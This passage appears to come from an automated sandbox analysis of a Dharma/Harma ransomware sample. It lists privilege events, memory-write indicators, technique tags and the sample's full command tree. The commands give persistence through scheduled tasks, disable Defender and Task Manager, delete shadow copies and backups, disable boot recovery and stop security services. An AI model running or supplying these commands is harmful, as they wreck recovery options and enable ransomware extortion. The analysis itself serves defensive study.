Token: SeTakeOwnershipPrivilege	1804	wevtutil.exe
Token: SeLoadDriverPrivilege	1804	wevtutil.exe
Token: SeSystemProfilePrivilege	1804	wevtutil.exe
Token: SeSystemtimePrivilege	1804	wevtutil.exe
Token: SeProfSingleProcessPrivilege	1804	wevtutil.exe
Token: SeIncBasePriorityPrivilege	1804	wevtutil.exe
Token: SeCreatePagefilePrivilege	1804	wevtutil.exe
Token: SeBackupPrivilege	1804	wevtutil.exe
Token: SeRestorePrivilege	1804	wevtutil.exe
Token: SeShutdownPrivilege	1804	wevtutil.exe
Token: SeDebugPrivilege	1804	wevtutil.exe
Token: SeSystemEnvironmentPrivilege	1804	wevtutil.exe
Token: SeRemoteShutdownPrivilege	1804	wevtutil.exe
Token: SeUndockPrivilege	1804	wevtutil.exe
Token: SeManageVolumePrivilege	1804	wevtutil.exe
Token: 33	1804	wevtutil.exe
Token: 34	1804	wevtutil.exe
Token: 35	1804	wevtutil.exe
Token: SeBackupPrivilege	1672	vssvc.exe
Token: SeRestorePrivilege	1672	vssvc.exe
Token: SeAuditPrivilege	1672	vssvc.exe
Token: SeDebugPrivilege	812	wevtutil.exe
Token: SeDebugPrivilege	1724	cmd.exe
Token: SeDebugPrivilege	2004	wevtutil.exe
Token: SeSecurityPrivilege	920	wevtutil.exe
Token: SeBackupPrivilege	920	wevtutil.exe
Token: SeSecurityPrivilege	1136	wevtutil.exe
Token: SeBackupPrivilege	1136	wevtutil.exe
Token: SeSecurityPrivilege	1508	wevtutil.exe
Token: SeBackupPrivilege	1508	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

VirusShare_5c36e305d926e55ef98d392176890cd2.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1868 wrote to memory of 1912	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 1912	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 1912	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1912 wrote to memory of 904	1912	cmd.exe	schtasks.exe
PID 1912 wrote to memory of 904	1912	cmd.exe	schtasks.exe
PID 1912 wrote to memory of 904	1912	cmd.exe	schtasks.exe
PID 1868 wrote to memory of 464	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 464	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 464	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 1924	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 1924	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 1924	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 320	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 320	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 320	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 320 wrote to memory of 332	320	cmd.exe	schtasks.exe
PID 320 wrote to memory of 332	320	cmd.exe	schtasks.exe
PID 320 wrote to memory of 332	320	cmd.exe	schtasks.exe
PID 1868 wrote to memory of 624	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 624	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 624	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 624 wrote to memory of 1712	624	cmd.exe	attrib.exe
PID 624 wrote to memory of 1712	624	cmd.exe	attrib.exe
PID 624 wrote to memory of 1712	624	cmd.exe	attrib.exe
PID 1868 wrote to memory of 1732	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 1732	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 1732	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1732 wrote to memory of 868	1732	cmd.exe	schtasks.exe
PID 1732 wrote to memory of 868	1732	cmd.exe	schtasks.exe
PID 1732 wrote to memory of 868	1732	cmd.exe	schtasks.exe
PID 1868 wrote to memory of 1160	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 1160	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 1160	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1160 wrote to memory of 1084	1160	cmd.exe	schtasks.exe
PID 1160 wrote to memory of 1084	1160	cmd.exe	schtasks.exe
PID 1160 wrote to memory of 1084	1160	cmd.exe	schtasks.exe
PID 1868 wrote to memory of 2024	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 2024	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 2024	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2024 wrote to memory of 1768	2024	cmd.exe	attrib.exe
PID 2024 wrote to memory of 1768	2024	cmd.exe	attrib.exe
PID 2024 wrote to memory of 1768	2024	cmd.exe	attrib.exe
PID 1868 wrote to memory of 304	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 304	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 304	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 304 wrote to memory of 816	304	cmd.exe	attrib.exe
PID 304 wrote to memory of 816	304	cmd.exe	attrib.exe
PID 304 wrote to memory of 816	304	cmd.exe	attrib.exe
PID 1868 wrote to memory of 2044	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 2044	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 2044	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2044 wrote to memory of 1472	2044	cmd.exe	cmd.exe
PID 2044 wrote to memory of 1472	2044	cmd.exe	cmd.exe
PID 2044 wrote to memory of 1472	2044	cmd.exe	cmd.exe
PID 1868 wrote to memory of 1796	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 1796	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1868 wrote to memory of 1796	1868	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1796 wrote to memory of 1508	1796	cmd.exe	cmd.exe
PID 1796 wrote to memory of 1508	1796	cmd.exe	cmd.exe
PID 1796 wrote to memory of 1508	1796	cmd.exe	cmd.exe
PID 1796 wrote to memory of 1784	1796	cmd.exe	taskkill.exe
PID 1796 wrote to memory of 1784	1796	cmd.exe	taskkill.exe
PID 1796 wrote to memory of 1784	1796	cmd.exe	taskkill.exe
PID 1508 wrote to memory of 2028	1508	cmd.exe	taskkill.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 5 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

1768 attrib.exe
816 attrib.exe
848 attrib.exe
1556 attrib.exe
1712 attrib.exe

pid	process
1768	attrib.exe
816	attrib.exe
848	attrib.exe
1556	attrib.exe
1712	attrib.exe

C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe
"C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1912
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
  2⤵
  - Drops startup file
  PID:464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
  2⤵
  PID:1924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:320
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F
    3⤵
    - Creates scheduled task(s)
    PID:332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:624
- - C:\Windows\system32\attrib.exe
    attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
    3⤵
    - Drops startup file
    - Views/modifies file attributes
    PID:1712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN hrm /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /RU SYSTEM /RL HIGHEST /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1732
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN hrm /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN Harma /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1160
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN Harma /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:1084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s harma.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2024
- - C:\Windows\system32\attrib.exe
    attrib +h +s harma.exe
    3⤵
    - Views/modifies file attributes
    PID:1768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\harma.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:304
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\ProgramData\harma.exe
    3⤵
    - Views/modifies file attributes
    PID:816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1796
- - C:\Windows\system32\taskkill.exe
    taskkill /f /t /im veeam*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:1760
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:1604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy HRMPRIV C:\ProgramData\HRMPRIV
  2⤵
  PID:2016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy HRMPUB C:\ProgramData\HRMPUB
  2⤵
  PID:1000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy id.harma C:\ProgramData\id.harma
  2⤵
  PID:1804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\HRMPRIV %userprofile%\Desktop\HRMPRIV
  2⤵
  PID:1140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\FILES ENCRYPTED.txt" "%userprofile%\Desktop\FILES ENCRYPTED.txt"
  2⤵
  PID:1052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:1908
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:1992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:1984
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:1952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  PID:908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  PID:1592
- - C:\Windows\system32\reg.exe
    reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
    3⤵
    PID:1584
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:1412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\FILES ENCRYPTED.txt" && exit
  2⤵
  PID:1168
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "C:\ProgramData\FILES ENCRYPTED.txt"
    3⤵
    PID:1556
- - C:\Windows\system32\sc.exe
    sc config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    - Launches sc.exe
    PID:1760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet
  2⤵
  PID:1604
- - C:\Windows\system32\cmd.exe
    cmd.exe /c vssadmin Delete Shadows /All /Quiet
    3⤵
    PID:908
  - - C:\Windows\system32\vssadmin.exe
      vssadmin Delete Shadows /All /Quiet
      4⤵
      Interacts with shadow copies
      PID:1004
  - - C:\Windows\system32\vssadmin.exe
      vssadmin Delete Shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:1512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete
  2⤵
  PID:1796
- - C:\Windows\system32\cmd.exe
    cmd.exe /c wmic shadowcopy delete
    3⤵
    PID:1092
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      PID:1804
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        5⤵
        
        PID:1456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
  2⤵
  PID:1060
- - C:\Windows\system32\cmd.exe
    cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
    3⤵
    PID:1176
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} boostatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no
  2⤵
  PID:812
- - C:\Windows\system32\cmd.exe
    cmd.exe /c bcdedit /set {default} recoveryenabled no
    3⤵
    PID:1680
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled no
      4⤵
      Modifies boot configuration data using bcdedit
      PID:1912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/
  2⤵
  PID:1492
- - C:\Windows\system32\cmd.exe
    cmd.exe /c wbadmin delete catalog -quiet/
    3⤵
    PID:1616
  - - C:\Windows\system32\wbadmin.exe
      wbadmin delete catalog -quiet/
      4⤵
      Deletes backup catalog
      PID:1096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop avpsus /y
  2⤵
  PID:1140
- - C:\Windows\system32\net.exe
    net stop avpsus /y
    3⤵
    PID:1484
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop avpsus /y
      4⤵
      PID:1716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y
  2⤵
  PID:1924
- - C:\Windows\system32\net.exe
    net stop McAfeeDLPAgentService /y
    3⤵
    PID:2044
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
      4⤵
      PID:1040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop mfewc /y
  2⤵
  PID:816
- - C:\Windows\system32\net.exe
    net stop mfewc /y
    3⤵
    PID:1768
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfewc /y
      4⤵
      PID:2000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y
  2⤵
  PID:1248
- - C:\Windows\system32\net.exe
    net stop BMR Boot Service /y
    3⤵
    PID:1032
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BMR Boot Service /y
      4⤵
      PID:956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:1780
- - C:\Windows\system32\net.exe
    net stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:772
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
      4⤵
      PID:1124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled
  2⤵
  PID:280
- - C:\Windows\system32\sc.exe
    sc config SQLTELEMETRY start=disabled
    3⤵
    - Launches sc.exe
    PID:2020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled
  2⤵
  PID:1808
- - C:\Windows\system32\sc.exe
    sc config SQLWriter start= disabled
    3⤵
    - Launches sc.exe
    PID:1580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled
  2⤵
  PID:1784
- - C:\Windows\system32\sc.exe
    sc config SstpSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:1796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F
  2⤵
  PID:1060
- - C:\Windows\system32\taskkill.exe
    taskkill /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F
  2⤵
  PID:1676
- - C:\Windows\system32\taskkill.exe
    taskkill /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:1724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F
  2⤵
  PID:1700
- - C:\Windows\system32\taskkill.exe
    taskkill /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:2004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
  2⤵
  PID:2000
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:1768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  PID:2024
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:1500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  PID:1896
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:1604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  PID:1556
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  PID:1428
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:1096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  PID:1992
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:1492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  PID:1484
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  PID:1592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  PID:1092
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:1668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  PID:1432
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:1140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  PID:816
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  PID:2020
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:1472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  PID:1452
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:1936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
  2⤵
  PID:908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q c:*.VHD c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win c:*.dsk
  2⤵
  PID:228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q d:*.VHD d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win d:*.dsk
  2⤵
  PID:236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q e:*.VHD e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win e:*.dsk
  2⤵
  PID:1580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q f:*.VHD f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win f:*.dsk
  2⤵
  PID:1760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q g:*.VHD g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win g:*.dsk
  2⤵
  PID:1696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del %0
  2⤵
  PID:1864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q h:*.VHD h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win h:*.dsk
  2⤵
  PID:280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s HRMPUB
  2⤵
  PID:1888
- - C:\Windows\system32\attrib.exe
    attrib +h +s HRMPUB
    3⤵
    - Views/modifies file attributes
    PID:848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\HRMPUB
  2⤵
  PID:844
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\ProgramData\HRMPUB
    3⤵
    - Views/modifies file attributes
    PID:1556
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
      4⤵
      PID:844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:1584
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
    3⤵
    PID:1952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
  2⤵
  PID:1716
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
    3⤵
    PID:1940
- C:\Windows\system32\cmd.exe
